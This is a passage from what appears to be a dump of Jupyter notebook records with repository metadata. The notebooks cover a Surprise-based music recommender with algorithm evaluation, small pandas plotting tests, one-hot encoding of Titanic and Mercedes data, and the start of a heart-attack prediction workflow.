"### 使用NMF\nfrom surprise import NMF,evaluate \nfrom surprise import Dataset\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\n\n\"计算歌曲之间的相识度\"\ntrainset = loaded_musicdata.build_full_trainset()\nprint(\"构建数据集合完成。。。\")\n\n\"建模\"\nalgo= NMF()\nalgo.train(trainset)\nprint (\"建模完成。。。\")\n\n\"指定 user inner id = 4\"\nuser_inner_id = 4 \nitem_inner_id_andrating = trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)\nitem_inner_id = map(lambda x:x[0], item_inner_id_andrating)\n\n\"这里不同的是讲inner id全部转成 raw user and itme id 做predict \"\nfor item_iid in item_inner_id:\n print (algo.predict(uid = algo.trainset.to_raw_uid(user_inner_id),iid = algo.trainset.to_raw_iid(item_iid),r_ui = 1, clip = True,verbose=False),\n songid_to_name[algo.trainset.to_raw_iid(item_iid)])",
"构建数据集合完成。。。\n建模完成。。。\nuser: 400232387 item: 27724082 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 听见下雨的声音\t魏如昀\nuser: 400232387 item: 167916 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 梦一场\t萧敬腾\nuser: 400232387 item: 408307325 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 干杯\t西瓜Kune\nuser: 400232387 item: 394618 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 给自己的歌 (Live) - live\t纵贯线\nuser: 400232387 item: 421423806 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小半\t陈粒\nuser: 400232387 item: 394485 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 思念是一种病(Live) - live\t张震岳\nuser: 400232387 item: 5239563 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 可以不可以\t丁当\nuser: 400232387 item: 30635613 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 秋酿\t房东的猫\nuser: 400232387 item: 185884 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 退后\t周杰伦\nuser: 400232387 item: 276936 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 阴天\t莫文蔚\nuser: 400232387 item: 27867458 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 痛爱\t容祖儿\nuser: 400232387 item: 370776 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 二十世纪少年(Unplugged) - unplug\tPing Pung\nuser: 400232387 item: 213673 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 前所未见\t陈慧琳\nuser: 400232387 item: 355992 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 追梦赤子心\tGALA\nuser: 400232387 item: 326904 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 如果你也听说\t张惠妹\nuser: 400232387 item: 156099 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 寄生\t吴克羣\nuser: 400232387 item: 255219 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 怎么唱情歌\t刘惜君\nuser: 400232387 item: 33314587 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 忽然之间\t巴士那\nuser: 400232387 item: 287744 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 烟霞\t容祖儿\nuser: 400232387 item: 409650841 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小幸运\t双笙\nuser: 400232387 item: 165005 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 错过\t王铮亮\nuser: 400232387 item: 307594 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 泪海\t许茹芸\nuser: 400232387 item: 276904 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 外面的世界\t莫文蔚\nuser: 400232387 item: 255973 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 短发\t梁咏琪\nuser: 400232387 item: 82561 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遗憾\t方炯镔\nuser: 400232387 item: 316637 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 假如让我说下去\t杨千嬅\nuser: 400232387 item: 169617 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱你\t许志安\nuser: 400232387 item: 400074175 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你的手信\t陈慧敏\nuser: 400232387 item: 307018 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遗憾\t许美静\nuser: 400232387 item: 417833356 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 无终\t谢春花\nuser: 400232387 item: 408332757 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 骄傲的少年\t南征北战\nuser: 400232387 item: 26609894 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一个人一座城\t曹寅\nuser: 400232387 item: 26418879 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 好得很\t麦家瑜\nuser: 400232387 item: 328169 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 终身美丽\t郑秀文\nuser: 400232387 item: 306709 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 倾城\t许美静\nuser: 400232387 item: 32507551 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 想要你知道\t许亚童\nuser: 400232387 item: 28661071 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 忆她\t赵烁\nuser: 400232387 item: 31134197 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 边走边唱\t李荣浩\nuser: 400232387 item: 36199595 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 再见只是陌生人\t庄心妍\nuser: 400232387 item: 370577 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 每条伤心的大街\t飘乐队\nuser: 400232387 item: 109174 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 死结\t李玖哲\nuser: 400232387 item: 413834900 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我是你的影子\tXun(易硕成)\nuser: 400232387 item: 67032 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 孤儿仔\t陈奕迅\nuser: 400232387 item: 409650851 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 霜雪千年\t双笙\nuser: 400232387 item: 32334601 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 想起小时候\t前冲\nuser: 400232387 item: 299604 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 给自己的情书\t王菲\nuser: 400232387 item: 176999 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 情非得已\t庾澄庆\nuser: 400232387 item: 188815 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 听说爱情回来过(Live) - live\t张敬轩\nuser: 400232387 item: 256468 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 至少还有你\t林忆莲\nuser: 400232387 item: 35476048 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 致自己\t齐一\nuser: 400232387 item: 405343398 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 可惜我不是他\tXun\nuser: 400232387 item: 28668855 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 恋人心\t魏新雨\nuser: 400232387 item: 417596830 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 美好事物\t房东的猫\nuser: 400232387 item: 31284039 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你就要走了\t花粥\nuser: 400232387 item: 35528482 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一半\t薛之谦\nuser: 400232387 item: 30814948 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 斑马斑马 - 翻唱\t房东的猫\nuser: 400232387 item: 413829873 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 还想听你的故事\t谢春花\nuser: 400232387 item: 27867140 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 房间\t刘瑞琦\nuser: 400232387 item: 28936273 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 狮子座(live)\t曾轶可\nuser: 400232387 item: 185811 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 青花瓷\t周杰伦\nuser: 400232387 item: 95610 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 目前\t洪卓立\nuser: 400232387 item: 407927304 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 月球下的人\t李幸倪\nuser: 400232387 item: 5240138 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 明明\t钟一宪\nuser: 400232387 item: 33872719 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一棵会开花的树(demo)\t谢春花\nuser: 400232387 item: 408814900 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 借我\t谢春花\nuser: 400232387 item: 27808044 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 丑八怪\t薛之谦\nuser: 400232387 item: 288075 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 习惯失恋\t容祖儿\nuser: 400232387 item: 65126 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 红玫瑰\t陈奕迅\nuser: 400232387 item: 30903117 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 漂洋过海来看你\t周深\nuser: 400232387 item: 92939 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 那女孩对我说\t黄义达\nuser: 400232387 item: 406730941 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 后来\t群星\nuser: 400232387 item: 29710981 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 喜剧之王\t李荣浩\nuser: 400232387 item: 22852057 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱你\t陈芳语\nuser: 400232387 item: 109628 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我爱你\t卢广仲\nuser: 400232387 item: 30039685 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遇见你的时候所有星星都落到我头上\t高姗\nuser: 400232387 item: 28798308 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一身诗意千寻瀑\t不才\nuser: 400232387 item: 374621 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你在烦恼什么\t苏打绿\nuser: 400232387 item: 27955777 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我为自己代言\t魏晨\nuser: 400232387 item: 25706282 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 夜空中最亮的星\t逃跑计划\nuser: 400232387 item: 28563317 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 阴天快乐\t陈奕迅\nuser: 400232387 item: 329371 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 原谅\t张玉华\nuser: 400232387 item: 36270514 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 放过自己\t庄心妍\nuser: 400232387 item: 238114 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 最好的我\t龚芝怡\nuser: 400232387 item: 276035 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱一点\t莫艳琳\nuser: 400232387 item: 210326 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 陪我看日出\t蔡淳佳\nuser: 400232387 item: 25657348 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 幸福了 然后呢\tA-Lin\nuser: 400232387 item: 135355 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 耿耿于怀\t麦浚龙\nuser: 400232387 item: 81836 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 不说出的温柔\t范逸臣\nuser: 400232387 item: 26075548 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 初爱\t杨宗纬\nuser: 400232387 item: 31284032 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 只不过是\t花粥\nuser: 400232387 item: 31445772 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 理想三旬\t陈鸿宇\nuser: 400232387 item: 41665696 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小幸运(Cover 田馥甄)\t金玟岐\nuser: 400232387 item: 325336 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 那又如何\t应嘉俐\nuser: 400232387 item: 31284031 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小相思\t花粥\nuser: 400232387 item: 287398 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我不难过\t孙燕姿\nuser: 400232387 item: 65601 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你看不到的天空\t蔡旻佑\nuser: 400232387 item: 407679465 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 耿耿于怀\t王笑文\nuser: 400232387 item: 416890227 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 试探\t王般若\nuser: 400232387 item: 28606499 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 有你陪伴的夏天\t黄婧\nuser: 400232387 item: 399354289 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 不说再见\t好妹妹乐队\n"
]
],
[
[
"### 可以使用以下方法来存储和重新加载模型",
"_____no_output_____"
]
],
[
[
"import surprise\nsurprise.dump.dump(\"./InternalData/Recommendation.model\",algo = algo) # save to local\n\n\"Reload Model Again\"\nreload_algo = surprise.dump.load(\"./InternalData/Recommendation.model\")",
"_____no_output_____"
]
],
[
[
"### 不同推荐系统算法之间的差距评估",
"_____no_output_____"
]
],
[
[
"\"首先载入数据Dataset\"\nfrom surprise import NMF,evaluate,NormalPredictor,BaselineOnly,KNNBasic,KNNWithMeans,KNNBaseline,SVD \nfrom surprise import Dataset,Reader,SVDpp,SlopeOne,CoClustering\nimport os,io\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\nloaded_musicdata.split(n_folds = 5)\n\n\"Return a list of ratings (user, item, rating, timestamp) read from\\ file_name\"\n#loaded_musicdata.read_ratings(file_path)\n",
"_____no_output_____"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = NMF()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm NMF.\n\n------------\nFold 1\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = NormalPredictor()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm NormalPredictor.\n\n------------\nFold 1\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = BaselineOnly()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm BaselineOnly.\n\n------------\nFold 1\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = KNNBasic()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm KNNBasic.\n\n------------\nFold 1\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = KNNWithMeans()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm KNNWithMeans.\n\n------------\nFold 1\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = SVD()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm SVD.\n\n------------\nFold 1\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 2\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 3\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 4\nRMSE: 0.0366\nMAE: 0.0167\n------------\nFold 5\nRMSE: 0.0367\nMAE: 0.0168\n------------\n------------\nMean RMSE: 0.0366\nMean MAE : 0.0167\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.01662157364728032, 0.016584225356639986, 0.016605750311511524, 0.016728002266939445, 0.016829999107087646], u'rmse': [0.03646898490849693, 0.0365140019773, 0.036506678247635156, 0.03664450724028625, 0.0367032737619232]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = SVDpp() # SVD++\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse','mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm SVDpp.\n\n------------\nFold 1\nRMSE: 0.0147\nMAE: 0.0063\n------------\nFold 2\nRMSE: 0.0147\nMAE: 0.0063\n------------\nFold 3\nRMSE: 0.0149\nMAE: 0.0065\n------------\nFold 4\nRMSE: 0.0151\nMAE: 0.0065\n------------\nFold 5\nRMSE: 0.0153\nMAE: 0.0066\n------------\n------------\nMean RMSE: 0.0149\nMean MAE : 0.0064\n------------\n------------\ndefaultdict(<type 'list'>, {'mae': [0.006321437663896232, 0.006263019339022795, 0.006458306290878363, 0.0065106171361254085, 0.006585042253559304], u'rmse': [0.014696295027144698, 0.014728653951463349, 0.014901658710573053, 0.015100227273104618, 0.015313478223964816]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = CoClustering()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse'], with_dump=False, dump_dir=None, verbose=1)\nprint (perf)\n",
"Evaluating RMSE of algorithm CoClustering.\n\n------------\nFold 1\nRMSE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"#help(data)\n#help(algo)\n#help(KNNBaseline)\n#help(KNNWithMeans)\n#help(Reader)\n#help(Dataset)\n#help(music_full_trainset)",
"_____no_output_____"
],
[
"#rid_to_name,name_to_rid = read_item_names()\n#rid_to_name['344']",
"_____no_output_____"
],
[
"#name_to_rid.values()\n#name_to_rid.keys()\n#name_to_rid[\"To Cross the Rubicon (1991)\"]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c0fe1b45259144c8d2bd222d1ab61ffa19182 | 44,348 | ipynb | Jupyter Notebook | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 28 | 2020-12-07T12:50:08.000Z | 2022-02-12T18:10:49.000Z | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 38 | 2020-02-23T18:09:46.000Z | 2020-07-20T17:24:10.000Z | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 38 | 2020-10-05T19:25:34.000Z | 2022-02-18T22:39:32.000Z | 273.753086 | 40,140 | 0.923694 | [
[
[
"## Simple tests\n\nuse this to experiment with jupyter",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame(hugo.participants_metadatas())",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"%matplotlib inline\ndf_plot = df.groupby(['company','status']).size().round().unstack().fillna(0)\ndf_plot.plot(kind='barh',figsize=(10,10),stacked=True, table=False)",
"_____no_output_____"
],
[
"sys.path",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb2c284d7ad5676757b23f0f9179bd7716f25cbe | 40,791 | ipynb | Jupyter Notebook | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | 26.765748 | 95 | 0.255449 | [
[
[
"##### Handle Categorical Features\n###### One Hot Encoding",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
],
[
"df=pd.read_csv('titanic.csv',usecols=['Sex'])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"pd.get_dummies(df,drop_first=True).head()",
"_____no_output_____"
],
[
"df=pd.read_csv('titanic.csv',usecols=['Embarked'])",
"_____no_output_____"
],
[
"df['Embarked'].unique()",
"_____no_output_____"
],
[
"df.dropna(inplace=True)",
"_____no_output_____"
],
[
"pd.get_dummies(df,drop_first=True).head()",
"_____no_output_____"
],
[
"#### Onehotencoding with many categories in a feature",
"_____no_output_____"
],
[
"df=pd.read_csv('mercedes.csv',usecols=[\"X0\",\"X1\",\"X2\",\"X3\",\"X4\",\"X5\",\"X6\"])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"for i in df.columns:\n print(len(df[i].unique()))",
"47\n27\n44\n7\n4\n29\n12\n"
],
[
"df.X1.value_counts().sort_values(ascending=False).head(10)",
"_____no_output_____"
],
[
"lst_10=df.X1.value_counts().sort_values(ascending=False).head(10).index\nlst_10=list(lst_10)",
"_____no_output_____"
],
[
"lst_10",
"_____no_output_____"
],
[
"import numpy as np\nfor categories in lst_10:\n df[categories]=np.where(df['X1']==categories,1,0)",
"_____no_output_____"
],
[
"lst_10.append('X1')",
"_____no_output_____"
],
[
"df[lst_10]",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c30d16c6591fa9a2243ca30e9fd6ff93ca2c7 | 20,341 | ipynb | Jupyter Notebook | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | 3 | 2021-06-05T15:07:08.000Z | 2021-07-29T14:23:23.000Z | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | null | null | null | model of Heart Attack.ipynb | rjnp2/Heart_Attack-EDA-Prediction | 17bc34d6e41f4e78adb34ec7a37ddcc20bfff016 | [
"MIT"
] | null | null | null | 27.525034 | 122 | 0.413795 | [
[
[
"## 1. Importing the required libraries for EDA",
"_____no_output_____"
]
],
[
[
"import pandas as pd \nimport numpy as np # For mathematical calculations \nimport seaborn as sns # For data visualization \nimport matplotlib.pyplot as plt # For plotting graphs \n%matplotlib inline \nsns.set(color_codes=True)\nimport warnings \nwarnings.filterwarnings(\"ignore\")\n\n# Scaling\nfrom sklearn.preprocessing import RobustScaler\n\n# Train Test Split\nfrom sklearn.model_selection import train_test_split\n\n# Models\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\n# Metrics\nfrom sklearn.metrics import accuracy_score, classification_report\n\n# Cross Validation\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\nprint('Packages imported...')",
"Packages imported...\n"
]
],
[
[
"## Reading Data",
"_____no_output_____"
]
],
[
[
"data=pd.read_csv(\"heart.csv\")\ndata.head()",
"_____no_output_____"
],
[
"data.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 303 entries, 0 to 302\nData columns (total 14 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 age 303 non-null int64 \n 1 sex 303 non-null int64 \n 2 cp 303 non-null int64 \n 3 trtbps 303 non-null int64 \n 4 chol 303 non-null int64 \n 5 fbs 303 non-null int64 \n 6 restecg 303 non-null int64 \n 7 thalachh 303 non-null int64 \n 8 exng 303 non-null int64 \n 9 oldpeak 303 non-null float64\n 10 slp 303 non-null int64 \n 11 caa 303 non-null int64 \n 12 thall 303 non-null int64 \n 13 output 303 non-null int64 \ndtypes: float64(1), int64(13)\nmemory usage: 33.3 KB\n"
],
[
"Q1 = data.quantile(0.25).loc['chol']\nQ3 = data.quantile(0.75).loc['chol']\nIQR = Q3 - Q1\nprint(IQR,data.shape)",
"63.5 (303, 14)\n"
],
[
"data = data[~((data.chol < (Q1 - 1.5 * IQR)) | (data.chol > (Q3 + 1.5 * IQR)))]\ndata.shape",
"_____no_output_____"
]
],
[
[
"## Scaling and Encoding features",
"_____no_output_____"
]
],
[
[
